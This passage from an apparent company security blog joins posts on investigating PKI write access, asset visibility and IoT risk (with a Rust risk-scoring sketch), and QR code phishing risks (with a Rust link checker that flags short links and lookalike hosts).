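        println!("investigate write access for {}", principal);
    }
}
```

Anything this returns is a candidate for investigation rather than proof of compromise, since the entry may simply be a leftover from testing.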

As attack methods continue to evolve, so will the means to investigate and remediate them. Becoming more familiar with how to secure PKI and which common vulnerabilities are exploited can help you know what to look out for when setting up and maintaining user privileges.

It’s estimated that in 2022 there are more than 23 billion connected devices around the world. In the next two years this number is likely to reach 50 billion, which is cause for concern. With so many devices linking systems it is going to create more vulnerabilities and more risks for businesses.

There’s absolutely no doubt that cyber security is essential for every business. Most are confident that they have their attack surface covered. But with ever-changing threats, how do you know if it’s sufficient? Especially with the increase in the number of connections and the very real risk that many assets aren’t known or visible.

Why visibility matters

Cyber security is about protecting business assets to maintain the ability to operate effectively. But without knowing what technology assets a business has, how they’re connected and what their purpose is, it’s difficult to manage and secure them. More critically, it’s impossible to make good decisions about cybersecurity or business operations.

When talking about assets, this goes beyond computers or network routers in an office. It could be a sensor on a solar array linked to an inverter that powers a commercial building. In the medical field it could be a scanner or an infusion pump in a hospital. Understanding what version of operating system (OS) a medical device has is as important as knowing what software the accounting system runs on. A very old version may no longer be supported and this could lead to vulnerabilities, given how connected systems are.

As an example: a medical infusion device was hooked up to a patient in a hospital. In the middle of the treatment it was observed that the device had malware on it. Normally the response would be to shut an infected device down and quarantine it. But in this particular medical context it wasn’t possible because it could have affected the well-being of the patient. Instead, it required a different approach. Nursing staff were sent to sit with the patient and monitor them to make sure the malware didn’t affect the treatment they were receiving. Then plans were set in place to isolate the device as soon as the treatment was completed, and send it in for remediation. This highlights why context is so important.

Understanding what assets form part of a business also requires understanding their context at a deeper level. Where are the assets located? What role do they perform? How critical are those assets to business operations and continuity? What’s the risk if they become compromised? And how do you remediate any vulnerabilities that are found?

Has work-from-home increased system risks?

At the start of the pandemic the priority for many businesses was continuity, i.e. finding ways to enable employees to work from home and connect to all the systems they needed. It’s fundamentally changed the way of working, especially as many businesses continue to embrace work-from-home and hybrid flexible working models. Employees have access to databases and SaaS systems, and they’re interacting with colleagues in locations across the globe. It’s all been made possible by the ability to connect anywhere in the world, but it’s not without risks. Now, post-pandemic, many of the vulnerabilities are starting to come to the fore and businesses aren’t always sure how to manage them.

In terms of assets, it’s resulted in an acceleration of a porous perimeter because it’s allowed other assets to be connected to the same networks that have access to corporate systems. By creating an access point for users, it has opened up connectivity to supposedly secured business operating systems through other devices that have been plugged in. Worse is that most businesses don’t have any visibility as to what those connected devices are. Without a way to scan an entire system to see what’s connected, where it’s connected and why it’s connected, it leaves a business vulnerable. These vulnerabilities are likely to increase in the future as more and more devices become connected in the global workplace.

What are the critical considerations for business enterprises moving forward?

Currently there is too much noise on systems and this is only going to get worse as connectivity increases. Businesses need to find ways to correlate and rationalize the data they’re working with to make it more workable and actionable. This will help to provide context and allow businesses to focus on the things that make the most impact, such as continuity of business operations and resilience.

An example is being able to examine many different factors about an asset to generate a risk score for that particular asset. This includes non-IT assets that typically aren’t scanned because there isn’t an awareness that they exist. The ability to passively scan for vulnerabilities across all assets enables businesses to know what they’re working with. It gives teams the opportunity to focus on the critical areas of business and supporting assets - both primary and secondary. Just having the right context enables people to make better decisions on where to prioritize their efforts and resources. This ability to focus is going to become even more critical as the volume of assets and connections increases globally, along with the risks and vulnerabilities that come with them.
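To make the idea of a per-asset risk score concrete, here is a minimal Rust sketch. The factors, weights and field names are assumptions chosen for illustration (they are not taken from Armis or any other product): exposure-related factors are summed and then scaled by how critical the asset is to the business.

```rust
// Hypothetical asset record; every field is an illustrative assumption.
struct Asset {
    name: String,
    os_supported: bool,    // is the OS version still supported by the vendor?
    internet_facing: bool, // reachable from outside the network?
    managed: bool,         // known to and managed by the security team?
    known_vulns: u32,      // count of known, unpatched vulnerabilities
    criticality: u8,       // 1 (low) to 5 (business or safety critical)
}

// Sums illustrative exposure weights (0 to 90) and scales the result by
// criticality (clamped to 1..=5), so the score ranges from 0 to 450.
fn risk_score(a: &Asset) -> u32 {
    let mut exposure: u32 = 0;
    if !a.os_supported {
        exposure += 30;
    }
    if a.internet_facing {
        exposure += 20;
    }
    if !a.managed {
        exposure += 15;
    }
    // Each known vulnerability adds 5 points, capped at 5 vulnerabilities.
    exposure += a.known_vulns.min(5) * 5;
    exposure * u32::from(a.criticality.clamp(1, 5))
}

fn main() {
    let mut assets = vec![
        Asset {
            name: "accounting server".to_string(),
            os_supported: true,
            internet_facing: false,
            managed: true,
            known_vulns: 1,
            criticality: 3,
        },
        Asset {
            name: "infusion pump".to_string(),
            os_supported: false,
            internet_facing: false,
            managed: false,
            known_vulns: 2,
            criticality: 5,
        },
    ];
    // Highest risk first, so teams can prioritise their effort.
    assets.sort_by_key(|a| std::cmp::Reverse(risk_score(a)));
    for a in &assets {
        println!("{:>4}  {}", risk_score(a), a.name);
    }
}
```

With these made-up weights the unmanaged infusion pump ranks well above the accounting server, which mirrors the point that context, not just vulnerability count, should drive prioritisation.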

To learn more about getting a handle on business deployments, listen to a recent SynerComm IT Trendsetters podcast with Armis in which they discuss the topic in more detail. Alternatively, you can also reach out to SynerComm.

The use of QR codes has grown exponentially in the last few years. So much so that the software for reading QR codes now comes as a default in the camera settings on most mobile devices. By just taking a photograph of a QR code the camera automatically brings up an option to open a link to access information.

The problem currently is that there is no way to verify if the link will take you to where it says it will, especially as most of the URLs shown by QR readers display as short links. Humans can’t read the digital signature, and there’s no way to manually identify what information is contained in a QR code or where it’ll lead. For individuals and businesses this poses a security risk.

Consider how many QR codes exist in public places and how broadly they’re used in marketing. From parking garage tickets to restaurant menus, promotions and competitions in-store. Now consider that QR codes can easily be created by anyone with access to a QR creator app. Which means they can also be misused by anyone. It’s really not hard for someone to create and print a QR code to divert users to an alternate URL and place it over a genuine one on a restaurant menu.

What led to the rise in adoption of QR codes

QR codes were created in the mid-1990s by a subsidiary of Toyota, Denso Wave. The purpose of the QR code development was to be able to track car parts through manufacturing and assembly. However, the developers created it as an open code with the intention that it could be freely used by as many people as possible. Marketers saw the opportunity in the convenience it offered and soon it became a popular way to distribute coupons and other promotions.

When the pandemic hit and social distancing became a requirement, QR codes were seen as the ideal solution for many different applications. Instead of having to hand over cash or a credit card, a QR code could be scanned for payment. Instead of handing out menus, restaurants started offering access to menus through QR codes. In many ways the pandemic was largely responsible for the acceleration of QR code adoption. QR codes were seen as a “safer” no-contact solution. But in making things easier and more convenient for consumers, it’s created a minefield when it comes to security.

How do QR codes create vulnerabilities compared to email?

Over the years people have learnt not to click on just any link that comes through their email account. There are a few basic checks that can be done. These include independently verifying where the email came from and whether the person or company is a known entity, as well as checking the destination URL of the link.

The problem with QR codes is that none of this information is available from looking at one. It’s just a pattern of black and white blocks. Even when bringing up the link, this is usually a short link so it’s not even possible to validate the URL. On email there are a number of security options available, including firewalls, anti-phishing and anti-virus software that can scan incoming emails and issue alerts. But nothing like this exists for QR codes.

Currently there is no software or system capable of scanning and automatically authenticating a QR code in the same way as an anti-virus would do for email. Without technology available to help with security, reducing vulnerabilities is reliant on education.

Best practices to reduce vulnerabilities:

As most QR codes are scanned with a mobile device, and most employees also access company emails and apps from their phones, there needs to be greater awareness of the risks that exist. Criminals are increasingly targeting mobile phones and individual identities in order to gain access to business systems. If an employee inadvertently clicks on a link from a QR code that is from a malicious source, it could set off a chain reaction. With access to the phone, it may also be possible to gain access to all the apps and systems on that phone – including company data.

From a user perspective, the key thing to know is that gaining access through a QR code requires manual input. The camera on a mobile phone may automatically scan a QR code when it sees it, but it still requires the user to manually click on the URL for anything to happen. That is the best opportunity to stop any vulnerability. Dismiss the link and there’s no risk. The QR code can’t automatically run a script or access the device if the link is ignored.

From a business perspective, if you’re using QR codes and want people to click on them, you need to find ways to increase transparency and show where the link is sending them. The best way to do this is to avoid the use of short links. Show the actual URL and provide a way to validate that it’s a genuine promotion or link to your website.
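A business publishing QR codes could run a check like the one below before printing, to confirm that the encoded link shows its real destination. This is a minimal Rust sketch using only the standard library: the host parsing is deliberately simplified (lowercase `http`/`https` schemes only, no IPv6 literals), the shortener list is a small illustrative sample, and the function and type names are hypothetical.

```rust
// Small illustrative sample of URL shortener domains, not a complete list.
const KNOWN_SHORTENERS: [&str; 3] = ["bit.ly", "tinyurl.com", "t.co"];

#[derive(Debug, PartialEq)]
enum LinkCheck {
    Ok,             // host is the expected domain or one of its subdomains
    ShortLink,      // destination is hidden behind a shortener
    UnexpectedHost, // link points somewhere other than the expected domain
    Unparseable,    // not an http(s) URL this sketch understands
}

// Extracts the host from an http(s) URL, dropping any userinfo and port.
fn host_of(url: &str) -> Option<&str> {
    let rest = url
        .strip_prefix("https://")
        .or_else(|| url.strip_prefix("http://"))?;
    let authority = rest.split(|c: char| matches!(c, '/' | '?' | '#')).next()?;
    let host_port = authority.rsplit('@').next()?;
    let host = host_port.split(':').next()?;
    if host.is_empty() {
        None
    } else {
        Some(host)
    }
}

// Checks that the link visibly leads to `expected_domain`.
fn check_qr_link(url: &str, expected_domain: &str) -> LinkCheck {
    let host = match host_of(url) {
        Some(h) => h.to_ascii_lowercase(),
        None => return LinkCheck::Unparseable,
    };
    if KNOWN_SHORTENERS.iter().any(|s| *s == host.as_str()) {
        return LinkCheck::ShortLink;
    }
    let expected = expected_domain.to_ascii_lowercase();
    let subdomain_suffix = format!(".{}", expected);
    if host == expected || host.ends_with(subdomain_suffix.as_str()) {
        LinkCheck::Ok
    } else {
        LinkCheck::UnexpectedHost
    }
}

fn main() {
    // example.com and .test are reserved names used here as placeholders.
    for url in [
        "https://menu.example.com/table/4",
        "https://bit.ly/3abcd",
        "https://example.com.evil.test/menu",
    ] {
        println!("{:?}  {}", check_qr_link(url, "example.com"), url);
    }
}
```

Note that the third link is rejected even though it starts with the expected name, because the check compares the end of the host rather than the beginning.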

QR code takeaway:

QR codes are in such broad circulation already, they’re not going away. But it’s a personal choice whether or not to use them. There’s nothing more personal in terms of technology than a mobile phone. If people want to improve their identity security there has to be a greater awareness of where the risks lie. Protecting devices, personal information and even access into company systems starts with a more discerning approach to QR codes.

Because the technology doesn’t currently exist to validate or authenticate QR codes, we need to learn how to use them in a safe way. We had to learn (often the hard way) not to insert just any memory card into a computer or open emails without scanning and validating them. Similarly, there needs to be a greater awareness to not scan just any QR code that’s presented.

To hear a more detailed discussion of QR codes and the security risks they pose, watch Episode 25 of IT Trendsetters Interview Series.